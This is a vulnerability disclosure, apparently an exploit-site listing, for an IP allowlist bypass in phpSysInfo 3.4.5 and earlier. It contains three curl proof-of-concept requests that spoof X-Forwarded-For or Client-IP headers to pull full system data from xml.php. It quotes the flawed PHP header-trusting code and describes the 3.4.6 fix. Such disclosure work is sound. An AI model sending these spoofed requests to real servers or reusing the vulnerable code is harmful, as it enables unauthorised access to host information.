## https://sploitus.com/exploit?id=PACKETSTORM:224403
# CVE-2026-55584 - phpSysInfo IP Allowlist Bypass
CWE-290, CVSS 7.5 (High), phpSysInfo <= 3.4.5
Refs: [GHSA-786w-p5pm-cvgh](https://github.com/phpsysinfo/phpsysinfo/security/advisories/GHSA-786w-p5pm-cvgh), [CVE.org](https://www.cve.org/CVERecord?id=CVE-2026-55584)
`PSI_ALLOWED` resolves the client IP from the attacker-controlled `X-Forwarded-For` (then `Client-IP`) headers before falling back to `REMOTE_ADDR`. There is no trusted-proxy concept, so spoofing an allowed IP defeats the allowlist and exposes full system info via `xml.php`.
PoC:
```bash
# allowlist set to an address the attacker doesn't own (ALLOWED=8.8.8.8)
curl -s http://target/xml.php # "Client IP address (...) not allowed."
curl -s -H "X-Forwarded-For: 8.8.8.8" http://target/xml.php # bypass, full XML
curl -s -H "Client-IP: 8.8.8.8" http://target/xml.php # bypass, full XML
```
Vulnerable code (`read_config.php`):
```php
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} elseif (isset($_SERVER["HTTP_CLIENT_IP"])) {
$ip = $_SERVER["HTTP_CLIENT_IP"];
} else {
$ip = $_SERVER["REMOTE_ADDR"]; // only trustworthy source, checked last
}
```
Fixed 3.4.6 (019fa2d): default to `REMOTE_ADDR`; honor `X-Forwarded-For` / `Client-IP` only from configured trusted proxies.
Reported by Muhammed Mirac Kayฤฑkci